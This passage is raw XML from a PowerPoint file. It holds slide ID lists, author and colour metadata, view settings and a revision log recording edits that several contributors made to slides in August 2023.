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73"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId74"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="259" r:id="rId2"/>
    <p:sldId id="1300" r:id="rId3"/>
    <p:sldId id="1196" r:id="rId4"/>
    <p:sldId id="1267" r:id="rId5"/>
    <p:sldId id="1326" r:id="rId6"/>
    <p:sldId id="1344" r:id="rId7"/>
    <p:sldId id="1343" r:id="rId8"/>
    <p:sldId id="1137" r:id="rId9"/>
    <p:sldId id="1161" r:id="rId10"/>
    <p:sldId id="1192" r:id="rId11"/>
    <p:sldId id="1202" r:id="rId12"/>
    <p:sldId id="1248" r:id="rId13"/>
    <p:sldId id="1304" r:id="rId14"/>
    <p:sldId id="1247" r:id="rId15"/>
    <p:sldId id="1194" r:id="rId16"/>
    <p:sldId id="1180" r:id="rId17"/>
    <p:sldId id="1327" r:id="rId18"/>
    <p:sldId id="1309" r:id="rId19"/>
    <p:sldId id="1131" r:id="rId20"/>
    <p:sldId id="1133" r:id="rId21"/>
    <p:sldId id="1134" r:id="rId22"/>
    <p:sldId id="1141" r:id="rId23"/>
    <p:sldId id="1339" r:id="rId24"/>
    <p:sldId id="1340" r:id="rId25"/>
    <p:sldId id="1142" r:id="rId26"/>
    <p:sldId id="1312" r:id="rId27"/>
    <p:sldId id="1158" r:id="rId28"/>
    <p:sldId id="1146" r:id="rId29"/>
    <p:sldId id="1328" r:id="rId30"/>
    <p:sldId id="1310" r:id="rId31"/>
    <p:sldId id="1181" r:id="rId32"/>
    <p:sldId id="1311" r:id="rId33"/>
    <p:sldId id="1182" r:id="rId34"/>
    <p:sldId id="1171" r:id="rId35"/>
    <p:sldId id="1323" r:id="rId36"/>
    <p:sldId id="1305" r:id="rId37"/>
    <p:sldId id="1157" r:id="rId38"/>
    <p:sldId id="1183" r:id="rId39"/>
    <p:sldId id="1144" r:id="rId40"/>
    <p:sldId id="1270" r:id="rId41"/>
    <p:sldId id="1271" r:id="rId42"/>
    <p:sldId id="1281" r:id="rId43"/>
    <p:sldId id="1282" r:id="rId44"/>
    <p:sldId id="1273" r:id="rId45"/>
    <p:sldId id="1276" r:id="rId46"/>
    <p:sldId id="1277" r:id="rId47"/>
    <p:sldId id="1313" r:id="rId48"/>
    <p:sldId id="1272" r:id="rId49"/>
    <p:sldId id="1255" r:id="rId50"/>
    <p:sldId id="1263" r:id="rId51"/>
    <p:sldId id="1262" r:id="rId52"/>
    <p:sldId id="1256" r:id="rId53"/>
    <p:sldId id="1298" r:id="rId54"/>
    <p:sldId id="1257" r:id="rId55"/>
    <p:sldId id="1150" r:id="rId56"/>
    <p:sldId id="1284" r:id="rId57"/>
    <p:sldId id="1285" r:id="rId58"/>
    <p:sldId id="1334" r:id="rId59"/>
    <p:sldId id="1333" r:id="rId60"/>
    <p:sldId id="1293" r:id="rId61"/>
    <p:sldId id="1292" r:id="rId62"/>
    <p:sldId id="1294" r:id="rId63"/>
    <p:sldId id="1324" r:id="rId64"/>
    <p:sldId id="1264" r:id="rId65"/>
    <p:sldId id="1258" r:id="rId66"/>
    <p:sldId id="1299" r:id="rId67"/>
    <p:sldId id="1290" r:id="rId68"/>
    <p:sldId id="1345" r:id="rId69"/>
    <p:sldId id="1169" r:id="rId70"/>
    <p:sldId id="1170" r:id="rId71"/>
    <p:sldId id="1168" r:id="rId72"/>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9992B0-225E-D2DB-838F-38D823437B2B}" name="Ellis Springe" initials="ES" userId="S::ellis.springe@ibm.com::cc85d384-7b82-4030-be6e-ff7e73a2ac5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AMES ROGERS" initials="JR" lastIdx="10" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="JAMES ROG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191F"/>
    <a:srgbClr val="FA4D56"/>
    <a:srgbClr val="FA4C55"/>
    <a:srgbClr val="FF8389"/>
    <a:srgbClr val="000000"/>
    <a:srgbClr val="DA1E27"/>
    <a:srgbClr val="740937"/>
    <a:srgbClr val="FF7E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218CE-7FF7-47CE-A744-A57007680622}" v="563" dt="2023-08-08T01:09:34.891"/>
    <p1510:client id="{6FD0BE9A-6880-4BB7-888B-7CA29C4151E1}" v="436" dt="2023-08-08T01:28:25.720"/>
    <p1510:client id="{72414730-3546-4FFB-85E2-816CFFCD306E}" v="8" dt="2023-08-07T20:16:24.824"/>
    <p1510:client id="{E7D0DC15-5A6A-49A6-A3DD-88CB847623B0}" v="154" dt="2023-08-08T17:21:45.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25"/>
    <p:restoredTop sz="81361"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="137" d="100"/>
          <a:sy n="137" d="100"/>
        </p:scale>
        <p:origin x="1576" y="1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0" d="100"/>
          <a:sy n="90" d="100"/>
        </p:scale>
        <p:origin x="372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Brink" clId="Web-{E7D0DC15-5A6A-49A6-A3DD-88CB847623B0}"/>
    <pc:docChg chg="addSld delSld modSld">
      <pc:chgData name="Scott Brink" userId="" providerId="" clId="Web-{E7D0DC15-5A6A-49A6-A3DD-88CB847623B0}" dt="2023-08-08T17:21:45.982" v="150"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="del">
        <pc:chgData name="Scott Brink" userId="" providerId="" clId="Web-{E7D0DC15-5A6A-49A6-A3DD-88CB847623B0}" dt="2023-08-08T17:21:45.982" v="150"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4218491503" sldId="1332"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add replId">
        <pc:chgData name="Scott Brink" userId="" providerId="" clId="Web-{E7D0DC15-5A6A-49A6-A3DD-88CB847623B0}" dt="2023-08-08T17:21:42.982" v="149" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3411436975" sldId="1345"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Scott Brink" userId="" providerId="" clId="Web-{E7D0DC15-5A6A-49A6-A3DD-88CB847623B0}" dt="2023-08-08T17:21:42.982" v="149" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3411436975" sldId="1345"/>
            <ac:spMk id="5" creationId="{43208311-B6DD-D44B-AD6A-8FC4ACF2CA0D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Sung Gwan Choi" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T01:09:34.891" v="517"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:36:11.722" v="54" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="672573208" sldId="1131"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:36:11.722" v="54" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="672573208" sldId="1131"/>
            <ac:spMk id="5" creationId="{D2CDA6A4-9F7F-3549-A896-C63D375DD497}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:40:42.679" v="216" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="858962982" sldId="1133"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:40:42.679" v="216" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="858962982" sldId="1133"/>
            <ac:spMk id="5" creationId="{43208311-B6DD-D44B-AD6A-8FC4ACF2CA0D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:41:02.570" v="224" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1162973885" sldId="1142"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:41:02.570" v="224" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1162973885" sldId="1142"/>
            <ac:spMk id="5" creationId="{D2CDA6A4-9F7F-3549-A896-C63D375DD497}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:44:22.635" v="299" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3037419514" sldId="1144"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:44:22.635" v="299" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3037419514" sldId="1144"/>
            <ac:spMk id="8" creationId="{363B5A2D-DD46-4A13-B901-27B425CB55AB}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:42:53.181" v="262" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1523779707" sldId="1157"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:42:53.181" v="262" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1523779707" sldId="1157"/>
            <ac:spMk id="5" creationId="{43208311-B6DD-D44B-AD6A-8FC4ACF2CA0D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:41:29.461" v="230" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2379456612" sldId="1158"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:41:29.461" v="230" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2379456612" sldId="1158"/>
            <ac:spMk id="5" creationId="{D2CDA6A4-9F7F-3549-A896-C63D375DD497}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:43:12.541" v="264" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="874552272" sldId="1183"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:43:12.541" v="264" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="874552272" sldId="1183"/>
            <ac:spMk id="11" creationId="{86B7800E-4B11-45F5-9639-DAD13BB583A2}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T01:00:50.071" v="452" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1858970995" sldId="1255"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T01:00:50.071" v="452" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1858970995" sldId="1255"/>
            <ac:spMk id="5" creationId="{43208311-B6DD-D44B-AD6A-8FC4ACF2CA0D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:41:49.790" v="243" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2576358297" sldId="1268"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:41:49.790" v="243" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2576358297" sldId="1268"/>
            <ac:spMk id="5" creationId="{D2CDA6A4-9F7F-3549-A896-C63D375DD497}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:42:03.790" v="254" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1182856112" sldId="1269"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:42:03.790" v="254" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1182856112" sldId="1269"/>
            <ac:spMk id="5" creationId="{D2CDA6A4-9F7F-3549-A896-C63D375DD497}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:54:40.363" v="310" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2545315433" sldId="1271"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:54:40.363" v="310" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2545315433" sldId="1271"/>
            <ac:spMk id="5" creationId="{43208311-B6DD-D44B-AD6A-8FC4ACF2CA0D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:55:45.489" v="325" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4128087911" sldId="1273"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:55:45.489" v="325" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4128087911" sldId="1273"/>
            <ac:spMk id="5" creationId="{43208311-B6DD-D44B-AD6A-8FC4ACF2CA0D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:54:56.738" v="311"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4128087911" sldId="1273"/>
            <ac:spMk id="9" creationId="{3A1CAB08-618D-199B-2FEC-921038830CF1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:55:25.020" v="320" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4128087911" sldId="1273"/>
            <ac:picMk id="7" creationId="{A60DF005-C67E-0430-3D5A-8C8FB5022792}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:55:52.880" v="326"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1796553621" sldId="1276"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:55:52.880" v="326"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1796553621" sldId="1276"/>
            <ac:spMk id="7" creationId="{431526E3-E163-C33C-B02E-6F9D895E7F9B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:58:51.976" v="398"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1754374452" sldId="1277"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:58:38.976" v="396" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1754374452" sldId="1277"/>
            <ac:spMk id="5" creationId="{43208311-B6DD-D44B-AD6A-8FC4ACF2CA0D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:56:05.177" v="327"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1754374452" sldId="1277"/>
            <ac:spMk id="9" creationId="{0434A4CB-2B4B-B7A6-DFB9-A2726D59C3C1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:58:51.976" v="398"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1754374452" sldId="1277"/>
            <ac:spMk id="13" creationId="{6BB67282-8003-9413-E3C2-7550D621D121}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:58:45.226" v="397" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1754374452" sldId="1277"/>
            <ac:picMk id="6" creationId="{03CB973D-857A-006F-1E8F-FAE32D1BAE9A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:55:07.738" v="314" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4145975533" sldId="1282"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:55:07.738" v="314" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4145975533" sldId="1282"/>
            <ac:spMk id="5" creationId="{43208311-B6DD-D44B-AD6A-8FC4ACF2CA0D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:54:59.894" v="312"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4145975533" sldId="1282"/>
            <ac:spMk id="9" creationId="{227D8E1B-716A-3DE9-4A0F-68437B871B60}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T01:09:25.625" v="516" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1711722024" sldId="1284"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T01:09:25.625" v="516" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1711722024" sldId="1284"/>
            <ac:spMk id="5" creationId="{43208311-B6DD-D44B-AD6A-8FC4ACF2CA0D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:53:59.143" v="306" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4189471400" sldId="1295"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T00:53:59.143" v="306" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4189471400" sldId="1295"/>
            <ac:spMk id="5" creationId="{D2CDA6A4-9F7F-3549-A896-C63D375DD497}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T01:08:50.844" v="509" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3682726219" sldId="1296"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T01:08:50.844" v="509" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3682726219" sldId="1296"/>
            <ac:spMk id="5" creationId="{D2CDA6A4-9F7F-3549-A896-C63D375DD497}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T01:09:34.891" v="517"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3384754915" sldId="1333"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T01:09:34.891" v="517"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3384754915" sldId="1333"/>
            <ac:spMk id="6" creationId="{9D47FAD8-9A53-6DD6-E3D2-4A94AE881EF2}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T01:03:31.495" v="463" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2533756484" sldId="1338"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{1AD218CE-7FF7-47CE-A744-A57007680622}" dt="2023-08-08T01:03:31.495" v="463" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2533756484" sldId="1338"/>
            <ac:spMk id="5" creationId="{D2CDA6A4-9F7F-3549-A896-C63D375DD497}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Sung Gwan Choi" clId="Web-{6FD0BE9A-6880-4BB7-888B-7CA29C4151E1}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{6FD0BE9A-6880-4BB7-888B-7CA29C4151E1}" dt="2023-08-08T01:28:25.720" v="425" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{6FD0BE9A-6880-4BB7-888B-7CA29C4151E1}" dt="2023-08-08T01:28:25.720" v="425" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3317395980" sldId="1180"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{6FD0BE9A-6880-4BB7-888B-7CA29C4151E1}" dt="2023-08-08T01:28:25.720" v="425" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3317395980" sldId="1180"/>
            <ac:spMk id="5" creationId="{D2CDA6A4-9F7F-3549-A896-C63D375DD497}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{6FD0BE9A-6880-4BB7-888B-7CA29C4151E1}" dt="2023-08-08T01:17:54.227" v="102" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1476270469" sldId="1264"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{6FD0BE9A-6880-4BB7-888B-7CA29C4151E1}" dt="2023-08-08T01:17:54.227" v="102" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1476270469" sldId="1264"/>
            <ac:spMk id="5" creationId="{43208311-B6DD-D44B-AD6A-8FC4ACF2CA0D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{6FD0BE9A-6880-4BB7-888B-7CA29C4151E1}" dt="2023-08-08T01:26:13.406" v="382" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2576358297" sldId="1268"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{6FD0BE9A-6880-4BB7-888B-7CA29C4151E1}" dt="2023-08-08T01:26:13.406" v="382" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2576358297" sldId="1268"/>
            <ac:spMk id="5" creationId="{D2CDA6A4-9F7F-3549-A896-C63D375DD497}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{6FD0BE9A-6880-4BB7-888B-7CA29C4151E1}" dt="2023-08-08T01:26:27.921" v="385" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1182856112" sldId="1269"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
